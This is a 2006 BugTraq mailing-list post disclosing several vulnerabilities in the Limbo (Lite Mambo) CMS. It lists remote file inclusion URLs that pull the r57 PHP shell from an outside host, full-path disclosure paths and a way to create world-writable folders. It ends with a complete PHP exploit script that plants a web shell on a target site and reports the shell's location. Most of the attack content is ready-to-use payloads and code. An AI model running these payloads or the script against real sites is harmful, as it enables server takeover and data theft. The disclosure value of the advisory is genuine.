BugTraq
Limbo - Lite Mambo CMS Multiple Vulnerabilities Sep 13 2006 06:01PM
security soqor net
Hello

Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including - Full path - make php shell - and create folder with 0777 permissions)

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

/*******************************************************/

Remote File Including

classes/adodbt/sql.php?classes_dir=http://www.soqor.net/tools/r57.txt?

/*******************************************************/

Make online php shell

admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&instal
l_dir=http://www.soqor.net/tools/r57.txt?

or :-

components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=htt
p://www.soqor.net/tools/r57.txt?

the shell link will be :

admin/components/com_fm/lang/fm.english.php

/*******************************************************/

Full Path :-

includes/metadata.php

editor/tiny_mce/plugins/imanager/imanager.php

components/com_fm/fm.install.php

admin/auth.php

admin/components/com_fm/fm.install.php

admin/components/com_gallery/gallery.install.php

admin/components/com_start/admin.start.news.php

admin/components/com_start/admin.start.html.php?lm_absolute_path=../../.
./

it can be usefull in the fallowing vulnerabilities

/*******************************************************/

Create A new Folder With 0777 Permission

- - + You Can Change the link and create your own folders ,, see the source code ..

admin/components/com_gallery/gallery.install.php?absolute_path=../../../

File dir:

images/gallery/thumbs/

admin/components/com_gositemap/gositemap.install.php?lm_absolute_path=..
/../

File dir:

admin/feed

admin/components/com_sitemap/sitemap.install.php?lm_absolute_path=../

File dir:

admin/components/feed

/*******************************************************/

WwW.SoQoR.NeT

Exploit:-

[code]

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* Limbo Portal Multiple vulnerabilities

/* This exploit should Create a PHP shell

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

*/

print_r('

/**********************************************/

/* Limbo Portal Creat PHP shell exploit */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */

/* site: http://www.soqor.net */');

if ($argc<2) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host

/* Example: */

/* php '.$argv[0].' http://localhost/

/**********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

$url=$argv[1];

$exploit="components/com_fm/fm.install.php?lm_absolute_path=../../&insta
ll_dir=http://www.soqor.net/tools/r57.txt?";

$page=$url.$exploit;

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($page);

if(!eregi("Warning",$page))

{

Die("\n[+] Exploit Finished\n[+] Go To : ".$url."admin/components/com_fm/lang/fm.english.php\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

}

Else

{

Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

}

?>

[/code]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus